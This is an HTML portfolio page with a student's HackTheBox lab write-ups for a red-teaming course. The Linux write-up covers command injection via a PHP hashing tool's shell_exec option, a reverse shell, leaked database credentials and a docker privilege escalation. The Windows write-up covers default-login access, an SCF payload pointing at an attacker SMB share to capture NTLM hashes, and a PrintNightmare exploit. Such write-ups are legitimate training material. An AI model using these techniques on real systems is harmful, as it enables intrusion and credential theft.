                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
